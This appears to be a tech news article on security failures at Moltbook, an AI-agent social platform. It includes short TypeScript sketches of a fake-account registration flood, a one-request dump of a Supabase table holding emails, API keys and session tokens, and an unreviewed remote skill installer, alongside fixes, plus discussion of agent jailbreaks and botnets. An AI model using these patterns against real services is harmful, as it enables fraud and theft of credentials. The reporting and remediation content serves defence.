1.5 Million Users, 99% Are Fake? The Meteoric Rise and Sudden Collapse of Moltbook

Deep News | 02-02 19:45

The AI social platform Moltbook, which recently skyrocketed to fame in the tech world, has been plunged into a dual crisis of data fraud and severe security vulnerabilities after claiming to have 1.5 million AI agent users. This rapid reversal from adulation to skepticism serves as a stark warning for the currently booming field of AI application development.

Gal Nagli, a security researcher at cloud security startup Wiz.io, publicly disclosed on social platform X that he managed to batch-register 500,000 accounts in a short time using just a single OpenClaw agent, directly calling into question the authenticity of the platform's user growth data. The root cause lies in the platform's lack of basic rate-limiting mechanisms during the account creation process, allowing registration data to be easily fabricated on a massive scale. According to an internal source, the platform's actual number of verified real users is only around 17,000.
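
Nagli has not published his tooling, and none of Moltbook's real API routes are documented here, but the class of attack he describes needs nothing sophisticated. Below is a minimal TypeScript sketch under assumed names (the endpoint path and payload shape are hypothetical): with no rate limiting or CAPTCHA on signup, half a million registrations is just a loop.

    // Minimal sketch of the attack class: unauthenticated account creation
    // with no server-side rate limiting. Endpoint and payload are hypothetical.
    async function registerFake(i: number): Promise<void> {
      await fetch("https://moltbook.example/api/agents/register", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ name: `agent_${i}` }),
      });
    }

    // 5,000 batches of 100 concurrent requests = 500,000 accounts.
    for (let batch = 0; batch < 5_000; batch++) {
      await Promise.all(
        Array.from({ length: 100 }, (_, j) => registerFake(batch * 100 + j)),
      );
    }

The server-side countermeasures are equally mundane: per-IP and per-account rate limits, plus a CAPTCHA or proof-of-work step at signup.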

A white-hat hacker, Jamieson O'Reilly, uncovered an even more serious security flaw: the Supabase backend key used by Moltbook was fully exposed in public requests, meaning an attacker could obtain all sensitive user data, including API keys, email addresses, and login tokens, simply by issuing a basic GET request. The vulnerability lets attackers impersonate any AI agent on the platform to post content, and even masquerade as any account, including that of Andrej Karpathy, a well-known figure in the AI field with 1.9 million followers.
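
Supabase exposes every table through an auto-generated REST layer, so a leaked project key combined with missing row-level security reduces "steal the database" to a single request. A sketch of the exposure class, with hypothetical project URL, table, and column names:

    // The Supabase REST API answers plain GETs authenticated only by the
    // project key. If that key is visible in public client traffic and
    // row-level security is off, one request dumps the table.
    // Project URL, table, and columns below are hypothetical.
    const SUPABASE_URL = "https://abcd1234.supabase.co";
    const LEAKED_KEY = "<key observed in the site's own public requests>";

    const res = await fetch(
      `${SUPABASE_URL}/rest/v1/agents?select=owner_email,api_key,session_token`,
      { headers: { apikey: LEAKED_KEY, Authorization: `Bearer ${LEAKED_KEY}` } },
    );
    console.log(await res.json()); // every row, with no authentication challenge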

The platform's mechanisms suffer from fundamental flaws. Moltbook describes itself as a "Reddit-like" social platform built specifically for AI agents, supporting posting, commenting, liking, and mutual following among agents. It employs a "recursive prompt enhancement" mechanism in which users install designated "skill" files with a single curl request, a "command-as-code" philosophy that dramatically lowers the barrier to entry (a sketch of this flow follows below). However, this radically simplified design has introduced structural weaknesses.

An analysis published by researcher David Holtz found that 93.5% of comments on Moltbook receive no replies, that conversations reach at most five levels deep, and that over one-third of messages are repetitive content. He criticized the platform sharply, saying it "more closely resembles 6,000 bots shouting repetitive phrases into the void."

More critically, the platform's identity verification is visibly weak. Although Moltbook requires each AI agent to be linked to a genuine X account, the service is built on a bare REST API with few security checks, so anyone holding an agent's API key can publish content under that agent's identity. Security researcher Harlan Stewart warned that widely circulated screenshots from the platform, such as AI agents "requesting cryptocurrency" or "advocating for an independent crypto system," are largely marketing content manufactured to attract traffic.
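
To make the "command-as-code" install flow concrete, here is a hedged TypeScript sketch of the pattern the article describes: fetch a remote "skill" file and drop it where the agent's prompt loader will read it. The URL, directory layout, and loader behavior are all assumptions, not Moltbook's actual implementation.

    // Sketch of a one-request skill install: remote text is fetched and
    // saved into a directory the agent treats as instructions on its next
    // run. Everything here is assumed for illustration.
    import { mkdir, writeFile } from "node:fs/promises";

    async function installSkill(url: string, name: string): Promise<void> {
      const res = await fetch(url);
      if (!res.ok) throw new Error(`skill fetch failed: ${res.status}`);
      const skill = await res.text(); // arbitrary remote content, trusted as-is
      await mkdir("skills", { recursive: true });
      await writeFile(`skills/${name}.md`, skill); // becomes part of the prompt
    }

    await installSkill("https://moltbook.example/skills/greeter.md", "greeter");

The convenience and the structural weakness are the same line: whatever the URL serves becomes part of the agent's instructions, unreviewed.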

Database exposure triggers a cascade of risks. The security vulnerabilities disclosed by white-hat hacker Jamieson O'Reilly affect multiple layers of Moltbook. The most severe is a misconfiguration of the platform's Supabase database that lets attackers read AI agent profiles and bulk-extract user data without any authorization. O'Reilly publicly appealed on social media for platform founder Matt Schlicht to "immediately disable Supabase database access permissions," and recommended a concrete fix: enable row-level security on the agents table and create restrictive access policies.
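
O'Reilly's two recommendations map onto standard Supabase hardening. The sketch below assumes a table named agents with an owner_id column (both assumptions); the SQL runs in the Supabase dashboard, and the request shows the effect:

    // Hypothetical fix, assuming a table "agents" with an "owner_id" column.
    // SQL run in the Supabase SQL editor:
    //
    //   alter table agents enable row level security;
    //   create policy "owner reads own agent"
    //     on agents for select
    //     using (auth.uid() = owner_id);
    //
    // With RLS enabled, the earlier anonymous dump comes back empty:
    const ANON_KEY = "<the same key that previously dumped the table>";
    const res = await fetch(
      "https://abcd1234.supabase.co/rest/v1/agents?select=*",
      { headers: { apikey: ANON_KEY, Authorization: `Bearer ${ANON_KEY}` } },
    );
    console.log(await res.json()); // [] once the restrictive policy is active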

Supabase CEO Paul Copplestone subsequently responded that his security advisory team had a "one-click fix" ready, but because database permissions must be managed by the customer, Supabase could not apply it directly. Platform founder Schlicht indicated the matter was being addressed.

The remediation process immediately exposed a deeper problem: because Moltbook has no web login, users can manage their AI agents only via API keys. Force-resetting all API keys to close the hole would instantly lock every user out of their account, since the platform has neither email verification nor a web-based password reset. O'Reilly suggested building a temporary interface that gives users a grace period to swap keys, or forcing users to re-authenticate through their linked X accounts (a sketch of the first option follows below).

Separately, a former Anthropic engineer disclosed a remote code execution vulnerability in OpenClaw, the agent framework Moltbook's users run, through which an attacker could gain system privileges within seconds of a user visiting a malicious webpage. The vulnerability has since been patched, but some companies have internally banned the platform's services over security concerns.
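
O'Reilly's grace-period idea is straightforward to sketch. The TypeScript below uses assumed names and an in-memory store standing in for a real database; nothing here reflects Moltbook's actual code. During a fixed window, an old key stays valid for exactly one operation: minting its replacement.

    // Sketch of grace-period key rotation. Names, window length, and
    // storage are assumptions for illustration.
    import { createHash, randomBytes } from "node:crypto";

    const sha256 = (s: string) => createHash("sha256").update(s).digest("hex");
    const keyHashes = new Map<string, string>();       // agentId -> sha256(key)
    const DEADLINE = Date.now() + 72 * 3600 * 1000;    // assumed 72-hour window

    function rotateKey(agentId: string, oldKey: string): string {
      if (keyHashes.get(agentId) !== sha256(oldKey)) throw new Error("bad key");
      if (Date.now() > DEADLINE)
        throw new Error("window closed: re-verify via the linked X account");
      const fresh = randomBytes(32).toString("hex");
      keyHashes.set(agentId, sha256(fresh));           // the old key dies here
      return fresh;                                    // returned exactly once
    }

After the deadline, recovery would fall back to re-authentication through the linked X account, the second option O'Reilly raised.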

The industry reflects on standards for AI application development. Despite the controversy, Andrej Karpathy, Tesla's former AI chief, expressed cautious interest in Moltbook's underlying technical direction. He said bluntly on social media that the platform is indeed riddled with spam, fraudulent ads, and privacy loopholes, calling it "a garbage dump right now," but he also emphasized:

"We've never seen large language model agents of this scale connected through a global, persistent, shared notebook designed specifically for agents."

Karpathy warned that as agents become more capable and their numbers grow, this network based on a shared notebook could produce unpredictable second-order effects. He predicted potential future risks, such as text viruses spreading among agents, jailbreak-style functional upgrades, and even the formation of botnets, stating:

"We are facing a computer security nightmare of unprecedented scale."

The industry widely regards Moltbook as a product of "vibe coding": code generated rapidly from AI prompts, without systematic engineering design or security review. The approach accelerates development, but it sacrifices reliability and security.

Prominent investor Balaji was lukewarm, noting that the concept of AI-to-AI interaction is not new and that the platform's so-called "agent dialogues" are still driven entirely by humans behind the scenes via prompts, with no genuine autonomy or personality.

According to media reports, Moltbook founder Matt Schlicht told NBC News that the platform is actually managed by an AI bot named "Clawd Clawderberg" and that he has largely withdrawn from daily intervention, "often unaware of what the AI admin is doing." Under current technology, this kind of autonomous operation without human supervision carries significant risk.

The Moltbook incident lays bare the deep tension between speed of innovation and security safeguards in AI application development. As agent numbers and capabilities grow rapidly, building robust mechanisms for identity verification, access control, and security auditing has become an urgent and unavoidable task for the industry.
